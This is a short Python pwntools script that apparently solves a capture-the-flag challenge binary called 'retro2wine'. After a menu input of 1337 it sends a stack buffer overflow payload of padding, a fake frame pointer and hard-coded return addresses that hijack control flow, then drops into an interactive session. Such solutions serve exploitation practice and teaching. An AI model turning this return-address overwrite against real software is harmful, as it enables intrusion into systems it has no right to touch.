#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./retro2wine")
# context.log_level='debug'
# p = remote("retro2win.ctf.intigriti.io", 1338)
p = process([exe.path])
def gdbs():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)

# gdbs()
sla(":","1337")
sla("cheatcode:",b"a"*0x10+p64(0x404f90)+p64(0x00000000004011ec)+p64(0x00000000004011D5))







p.interactive()
# good luck pwning :)

